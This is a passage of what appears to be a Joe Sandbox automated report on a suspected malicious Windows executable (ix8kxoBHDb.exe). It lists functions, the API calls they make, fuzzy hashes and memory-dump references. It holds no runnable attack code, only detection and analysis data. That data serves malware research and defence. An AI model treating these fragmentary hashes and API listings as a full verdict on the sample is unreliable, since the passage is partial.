Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: d36677f8d2e559cb387ccec067656e7046d6eb767eaf07478cee85b9d292eaec
Instruction ID: 3617ef58ccd7aa140dffe44bfab91b8a7bb5611f18f48832d751fbee8bc5d3eb
Opcode Fuzzy Hash: d36677f8d2e559cb387ccec067656e7046d6eb767eaf07478cee85b9d292eaec
Instruction Fuzzy Hash: AAE0DF72700100EBE710DFA4DE48EAA33A8DF40368B30823AF611B60D0E6B4A9419B3D

Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634

Function 00405F61 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4

Function 00405F90 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,004119EE,0040CED0,004033DE,0040CED0,004119EE,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8

Function 73B02993 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(73B0505C,00000004,00000040,73B0504C), ref: 73B029B1

Memory Dump Source

Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true

Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: f4b2d827fd437fd3b0a38c4d3cdf230342a6fe5f054660b2e062a59b43d6057d
Instruction ID: d94af527c41309f103985cbd12a60e5c8209d7c7a06c29e075fd01dddea6e0ac
Opcode Fuzzy Hash: f4b2d827fd437fd3b0a38c4d3cdf230342a6fe5f054660b2e062a59b43d6057d
Instruction Fuzzy Hash: 80F07FF2509280DED360EB2A878470E3FE4B728209B24A56BA19CDBE41F33454448F95

Function 0040234E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: PrivateProfileString
String ID:
API String ID: 1096422788-0
Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745

Function 00406255 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062E3,?,00000000,?,?,Call,?), ref: 00406279

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a6d18c98ee21f5be52796325d469c1a2d185cd06dd69ecfff736ff996b69b5af
Instruction ID: 5499d889e10e12284ba9d0e0803ee079e3e67a5a0dd97beb148b5d1e1bc1fcbb
Opcode Fuzzy Hash: a6d18c98ee21f5be52796325d469c1a2d185cd06dd69ecfff736ff996b69b5af
Instruction Fuzzy Hash: E7D01232B04100D7DB10DBA4AF4899D73A49B44369B304677E502F11D0D6B9D9519A2D

Function 004043AB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
Instruction ID: f8057fa4cd378f1a8adf26ed8b17c038a4feeda265d9f6fa174188bdeaa95141
Opcode Fuzzy Hash: a452b7de42f14c8de3af57d1a741f17fe5c7e0b0fce0339b2d36eea9d11f7e20
Instruction Fuzzy Hash: 1FC04C71780200BADA208BA49D85F0677545790700F1495797640E50E4C674D460D66C

Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00405A14 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00405A23

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: ExecuteShell
String ID:
API String ID: 587946157-0
Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69

Function 00404394 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

Function 00404381 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00404158), ref: 0040438B

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
Instruction ID: bc9b5adeae0d36b04141253452f110da710a6babf688c590b829c7787f218d6b
Opcode Fuzzy Hash: edeae3ac3cfecc704656ce7adf69815daf45002a40afc9e9c99c0eaf63a7b25e
Instruction Fuzzy Hash: 34A002B65445009BCE119F50DF05805BA71F7E47417518479A155510348A354561EB19

Non-executed Functions

Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404DE4
GetDlgItem.USER32(?,00000408), ref: 00404DEF
GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
LoadBitmapW.USER32(0000006E), ref: 00404E4C
SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
DeleteObject.GDI32(00000000), ref: 00404EC2
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
ShowWindow.USER32(?,00000005), ref: 0040501C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
ImageList_Destroy.COMCTL32(?), ref: 004051EC
GlobalFree.KERNEL32(?), ref: 004051FC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
ShowWindow.USER32(?,00000000), ref: 0040539B
GetDlgItem.USER32(?,000003FE), ref: 004053A6
ShowWindow.USER32(00000000), ref: 004053AD

Strings

M, xrefs: 00404F76
N, xrefs: 00405057
, xrefs: 00405385

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58

Function 00404850 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,Call), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00403480,C:\Users\user\AppData\Local\Temp\,756F3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

